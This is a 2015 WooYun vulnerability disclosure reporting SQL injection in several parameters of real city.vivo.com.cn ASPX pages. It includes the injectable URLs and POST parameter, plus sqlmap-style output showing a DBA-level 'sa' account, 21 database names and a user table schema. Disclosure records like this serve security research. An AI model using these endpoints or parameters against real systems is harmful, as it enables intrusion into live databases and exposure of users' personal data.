乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-29: 细节已通知厂商并且等待厂商处理中 2015-08-03: 厂商已经主动忽略漏洞,细节向公众公开
RT
多处SQL注入,多个参数注入第一处多参数:
http://city.vivo.com.cn/mb/CheckAll.aspx?actiontype=1&pageindex=2&t=0.7262028979603201&typeid=468参数actiontype存在注入参数pageindex存在注入参数t存在注入参数typeid存在注入
第二处多参数:
http://city.vivo.com.cn/pc/CheckAll.aspx?actiontype=1&pageindex=2&t=0.4454611742403358参数actiontype存在注入参数pageindex存在注入参数t存在注入参数typeid存在注入
第三处POST注入:
http://city.vivo.com.cn/mb/CheckAll.aspx?actiontype=MoreUpload&t=0.7064304086379707post参数:PowerHidden1=*&PowerHidden2=1PowerHidden参数存在注入
web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008current user: 'sa'current database: 'vivoPhone'current user is DBA: Trueavailable databases [21]:[*] BobbiBrown[*] BobbiBrown_WX[*] CKWJ[*] CKWJ_2[*] DeBON_WX[*] EHLL[*] Godiva[*] Inoherb[*] master[*] Melvita[*] model[*] msdb[*] NetShow_App_SM_WX[*] SephoraHR[*] SteveMadden[*] Stokke[*] Stokke_WX[*] Swarovski[*] tempdb[*] vivoPhone[*] WOWweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008Database: vivoPhone[4 tables]+-----------------+| CityScanFace || CityUpload || Logs || UserInformation |+-----------------+web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008Database: vivoPhoneTable: UserInformation[7 columns]+------------+----------+| Column | Type |+------------+----------+| Contact | nvarchar || GameTime | decimal || HeadImgUrl | nvarchar || NickName | nvarchar || OpenId | nvarchar || UniqueId | int || UserName | nvarchar |+------------+----------+
危害等级:无影响厂商忽略
忽略时间:2015-08-03 09:24
漏洞Rank:4 (WooYun评价)
暂无